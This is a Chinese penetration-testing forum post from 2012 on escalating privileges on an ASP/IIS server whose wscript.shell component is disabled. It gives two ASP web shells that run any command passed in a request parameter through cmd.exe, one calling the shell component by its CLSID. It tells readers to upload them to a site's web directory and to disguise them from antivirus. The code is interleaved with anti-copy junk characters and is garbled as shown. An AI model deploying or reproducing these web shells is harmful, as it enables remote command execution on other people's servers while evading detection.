找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 没有wscript.shell组件提权方法
返回列表 发新帖
查看: 3338|回复: 0
打印 上一主题 下一主题

没有wscript.shell组件提权方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-10-21 09:08:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  • 可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。3 r7 `! `% v! D8 D3 t0 L! n
  • 一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
    + e6 q4 r% b! u, n6 o. b. k; l" _
  • 要想让运行命令可以试试这种方法,成功率为五五之数。
    % e4 D: \( k9 H5 k7 V( _. ~
  • 把下面代码复制:
    7 l) u; m2 J5 c9 s4 H; J
  • <%! b3 V0 E6 V3 v0 ~% s
  • end if( ~; Y, S, \$ U# C  j# @( `
  • response.write(”")3 L* n: m. Q+ A  e5 ?( N
  • On Error Resume ' z- w1 P. s( n: `/ ?. t& |
  • Next# T2 o  T# h4 s. d* u3 A
  • response.write oScriptlhn.exec(”cmd.exe /c” & " [! |4 Z3 [  Q$ n5 ]
  • request(”c”)).stdout.readall
    6 ~; f2 |( n! Y3 l' u1 h- C$ l
  • response.write(”")
    6 M4 [, P" v' a) p  m
  • response.write(”")+ B+ R; g8 ]; a$ W' F
  • response.write(”4 N# o3 E. g" L% S5 C$ c, H! f4 F
  • “)
    " d5 i+ k% M- s5 y
  • response.write(”")
    . w; I% k8 `- V2 y/ Y
  • %>. Z  K; V5 Y7 V$ {
  • 保存为一个asp文件,然后传到网站目录上去* n+ P' M; |  h5 b
  • 运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。0 e: D) R* X  v- ]
  • 我用此成功运行过cacls命令。
    + c: X1 i6 {& q. F& x( W' U  E3 E& t
  • 第二那就是运行时出错,可能限制某些代码执行7 _4 H- y" w# F! m
  • 无wscript.shell组件提权又一个方法
    2 l. l, T& I1 B; p0 T
  • <object runat=server id=oScriptlhn scope=page ' e3 _6 L9 W4 Y. ?! q7 Q" M2 ~
  • 4 D+ G8 N1 x/ t6 _. H# J5 {
  • classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object># D) Q% E$ F. s+ [
  • <%if err then%>
    ) g/ ?, T6 R7 g1 d2 X9 x
  • <object runat=server id=oScriptlhn scope=page
    ; d# h5 B2 V5 f9 z8 O6 U
  • 6 v  x( H9 |" M7 s3 E$ _, }, o1 ?
  • classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>
    5 Y! |& o; {. g  V
  • <%
    5 N* f3 C$ J/ |/ W7 g5 c
  • end if
    0 f' V* {. r4 M1 v1 d8 H
  • response.write(”<textarea readonly cols=80
    ; D. C' U5 T- T) i. P9 ~

  • 1 ?& A2 N5 e) K3 @- L% B. `
  • rows=20>”)
    5 D' W7 q4 }" C2 U9 ?/ g# O
  • On Error Resume Next , P1 {) I' Z9 V2 B" z
  • response.write & Y# N# _% E# i. T! F% t
  • % H. ?& j  m8 R! H  K. r7 q4 U( t
  • oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall
    6 n* S. F: F" I4 B
  • response.write(”</textarea>”)
    , p% ~  C! C$ |1 n6 u4 k# B2 [
  • response.write(”<form
    ' S# y5 Q8 l7 ?  ~+ ]- |9 V
  • 0 z4 Q% Q/ _% a* B0 q, @! M
  • method=’post’>”)
    ! Y; z* n- W  S$ ~9 T
  • response.write(”<input type=text name=’c'
    3 \. \7 }4 A/ f+ [4 Q

  • & o1 v0 R" g4 o& e5 Z! P/ n
  • size=60><br>”)
    $ {- c$ A( J6 L
  • response.write(”<input type=submit
    $ S" w9 q  Z6 t4 v5 w. L7 @

  • ! U4 B& h3 s  }- [
  • value=’执行’></form>”) 1 g. i7 Q" J' r5 F0 f
  • %>3 a8 S, k5 ?% M
  • 保存为ASP,此代码可能被杀,请注意免杀。
    7 s3 o( j% @" H. f& e9 ?
  • 原理:有些人把wscript.shell改名了,但是clsid没有变,所以调用这个clsid就等于调用ws组建; m0 d7 h! D0 Z- K8 d' R' t% L8 r
复制代码
request, server, 成功率

相关帖子
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表